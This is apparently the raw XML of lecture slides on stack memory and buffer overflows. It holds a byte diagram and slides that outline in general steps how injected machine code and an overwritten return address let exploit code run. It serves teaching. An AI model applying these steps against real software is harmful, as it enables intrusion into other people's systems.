                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>','</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="49" name="Rectangle 48">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DA5D2E2-BF7A-A746-ADBA-D80FC969B43E}"/>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6F</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FFFF00"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>'o'</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="50" name="Rectangle 49">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6D0C945-EEEE-A842-A23B-612051A4C444}"/>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6C</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FFFF00"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>'l'</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="51" name="Rectangle 50">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7B83394-4AB7-D74B-932F-AD6D407C5F0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6C</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FFFF00"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>'l'</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="52" name="Rectangle 51">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53918AA8-B2DA-2844-A360-A5D2BF157729}"/>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53" name="Rectangle 52">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39FF9F7F-559A-0949-A04D-B7531443572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grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="19" name="Group 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D6A8A54-BA3E-954C-8685-6CC4C16BFC05}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6512878" y="3586038"/>
              <a:ext cx="4830980" cy="794006"/>
              <a:chOff x="9208848" y="3986002"/>
              <a:chExt cx="1940175" cy="245224"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="002060"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="38" name="Rectangle 37">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6FE8C65-C0B6-574D-9974-E650CDFD248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39" name="Rectangle 38">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36807E26-49F0-F84F-B66D-83AA2F327876}"/>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0" name="Rectangle 39">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5636A81-1E15-C94A-B7D1-A23AFDCA2139}"/>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1" name="Rectangle 40">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30BC046B-6107-6E4D-A8E8-EAE6A66EEA5D}"/>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2" name="Rectangle 41">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{901D8A73-C97D-7840-B086-28798EB3CBEA}"/>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3" name="Rectangle 42">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B816009-6E15-B643-9B4C-A4329D677DA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4" name="Rectangle 43">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20BF925B-8B44-F140-A8FD-80DB6D9C1333}"/>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5" name="Rectangle 44">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB08D40E-A0E6-AA4C-8EBE-14BB49033220}"/>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20" name="Group 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6FEF59CE-F5DC-9C45-8FDE-DF7712C7A5A0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6512878" y="1993802"/>
              <a:ext cx="4830980" cy="794006"/>
              <a:chOff x="9208848" y="3986002"/>
              <a:chExt cx="1940175" cy="245224"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="002060"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="30" name="Rectangle 29">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{651F2185-3DD5-AE45-B71D-CE0D390CCB33}"/>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1" name="Rectangle 30">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26B2AED7-1714-6748-8D01-56F42F516CBA}"/>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2" name="Rectangle 31">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A88FD18-FB81-D34A-8286-87B367492F6B}"/>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3" name="Rectangle 32">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C268F30-B5DF-C546-A75F-7431BC2CC0FF}"/>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34" name="Rectangle 33">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F34392E-3EC0-874B-A6B8-B5120E2A07BC}"/>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21</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>'!'</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35" name="Rectangle 34">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECB6725C-5C96-2841-8CE8-7F1DC1263DFC}"/>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6C</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>'l'</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36" name="Rectangle 35">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{453A35DA-871B-C545-8B2D-2F25CEF21339}"/>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72</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>'r'</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="37" name="Rectangle 36">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91ABDFFB-654E-DE43-9A9A-F3BA085B778A}"/>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6F</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>'o'</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="21" name="Group 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3970234-89AA-5D4E-A3B9-E320A5BF972A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6512878" y="1197691"/>
              <a:ext cx="4830980" cy="794006"/>
              <a:chOff x="9208848" y="3986002"/>
              <a:chExt cx="1940175" cy="245224"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="002060"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="22" name="Rectangle 21">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{515E9875-795D-F34C-A347-50DC2AC7B2AF}"/>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3" name="Rectangle 22">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18221BD3-D958-D843-8D27-AC85FC92748E}"/>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 name="Rectangle 23">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{644AA429-2F35-A341-8A6D-449112CD844A}"/>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5" name="Rectangle 24">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECB9EFB8-17D4-514F-82EA-55A8885E5C37}"/>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6" name="Rectangle 25">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22389241-B367-DE49-8D0C-4738EA9580C5}"/>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27" name="Rectangle 26">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CE8B45F-10A2-4149-8798-D3CDDF88D9BD}"/>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8" name="Rectangle 27">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{321446DE-67D0-664B-A1F5-7E5E88263BBC}"/>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05</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="29" name="Rectangle 28">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2931D413-E448-4842-AFD4-4A8382A8295F}"/>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EB</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="Oval 54">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{946CA7EA-AA42-1A4F-9E72-75DAE4043D42}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10352772" y="1233440"/>
            <a:ext cx="1824032" cy="7958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heel(1)">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5" fill="hold" grpId="0" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="randombar(vertical)">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randombar(vertical)">
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="16"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="25" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="26" presetID="14" presetClass="entr" presetSubtype="5"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vertical)">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="17"/>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randombar(vertical)">
                                      <p:cBhvr>
                                        <p:cTn id="31" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="54"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="32" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="33" presetID="21" presetClass="entr" presetSubtype="1"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heel(1)">
                                      <p:cBhvr>
                                        <p:cTn id="35"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54" grpId="0"/>
      <p:bldP spid="56" grpId="0" animBg="1"/>
      <p:bldP spid="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a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Yes, yes I can.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23</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33849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strips(downRight)">
                                      <p:cBhvr>
                                        <p:cTn id="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Injecting &amp; Executing New Code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Content Placeholder 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6D8ACA9-E645-4C4B-81EE-B6A7D3C2CC61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838199" y="1825625"/>
            <a:ext cx="6437727" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Write assembly code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Determine byte representation of code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Construct string with</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>machine code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“return address” of first injected instruction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When vulnerable procedure returns, exploit code executes</a:t>
            </a:r>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16" name="Group 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A36BBC98-0B49-3345-B4AA-6B84F1C78450}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6787588" y="455730"/>
            <a:ext cx="3646024" cy="5914133"/>
            <a:chOff x="6588078" y="451413"/>
            <a:chExt cx="3646024" cy="5914133"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Rectangle 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18C59379-ED95-BD47-B14A-5624D300482D}"/>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6B808C7D-15AF-A84C-8970-FD3B11EA935A}"/>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9" name="Rectangle 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42B51A09-BB68-624B-A33B-BB39C4CBAB84}"/>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0" name="Rectangle 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{452188B0-AD60-5247-9BB9-8F96D5F4FD54}"/>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1" name="Rectangle 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D736A089-520A-0640-A5F9-44F08481EDBE}"/>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35787DD-9701-454D-A09C-0CD623C45477}"/>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3" name="Straight Arrow Connector 22">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04DBF941-6525-4F43-B898-0B2479E8F60B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="22"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74B9D00-D815-A143-8545-C4E73F25B764}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8959448" y="5147021"/>
            <a:ext cx="1469984" cy="467508"/>
            <a:chOff x="9124092" y="5147021"/>
            <a:chExt cx="1305340" cy="467508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="Rectangle 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB722E97-DF9E-CD46-BF75-88C5B01C2DD0}"/>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FBCF1E-7558-1F43-9206-C9D6C20E0778}"/>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9CB863-457F-1E43-B3F9-C7D5B4600137}"/>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BA4F04C-C736-9740-9301-26DEF68FB475}"/>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50FC02-E59C-4644-A998-C9B46D0F403D}"/>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8EA02A2-19B2-A042-8DE4-D23C8A5480FD}"/>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10EAEF-74B7-4F43-93EE-1025F045552E}"/>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914C18-A8CD-4F4A-ABE5-CAB10594955C}"/>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A9A35CA-562F-C343-86F0-B316A37AD23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34" name="Straight Arrow Connector 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FE7C1AB-4A8C-8345-8962-CC0837F782A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="33"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40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515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Where to Place New Code?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Content Placeholder 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6D8ACA9-E645-4C4B-81EE-B6A7D3C2CC61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1690688"/>
            <a:ext cx="5181600" cy="4802187"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>At buffer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploit code must fit between buffer &amp; return address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Buffers generally large enough for several instructions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>After return address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploit code must fit between return address &amp; stack bottom</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>More likely to cause error</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a:xfrm>
            <a:off x="4038600" y="6356350"/>
            <a:ext cx="4114800" cy="365125"/>
          </a:xfrm>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a:xfrm rot="16200000">
            <a:off x="-2229811" y="4259137"/>
            <a:ext cx="4828674" cy="369052"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Slide by Bohn</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="16" name="Group 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A36BBC98-0B49-3345-B4AA-6B84F1C78450}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6787588" y="455730"/>
            <a:ext cx="3646024" cy="5914133"/>
            <a:chOff x="6588078" y="451413"/>
            <a:chExt cx="3646024" cy="5914133"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Rectangle 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18C59379-ED95-BD47-B14A-5624D300482D}"/>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6B808C7D-15AF-A84C-8970-FD3B11EA935A}"/>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9" name="Rectangle 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42B51A09-BB68-624B-A33B-BB39C4CBAB84}"/>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0" name="Rectangle 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{452188B0-AD60-5247-9BB9-8F96D5F4FD54}"/>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1" name="Rectangle 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D736A089-520A-0640-A5F9-44F08481EDBE}"/>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35787DD-9701-454D-A09C-0CD623C45477}"/>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3" name="Straight Arrow Connector 22">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04DBF941-6525-4F43-B898-0B2479E8F60B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="22"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74B9D00-D815-A143-8545-C4E73F25B764}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8959448" y="5147021"/>
            <a:ext cx="1469984" cy="467508"/>
            <a:chOff x="9124092" y="5147021"/>
            <a:chExt cx="1305340" cy="467508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="Rectangle 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
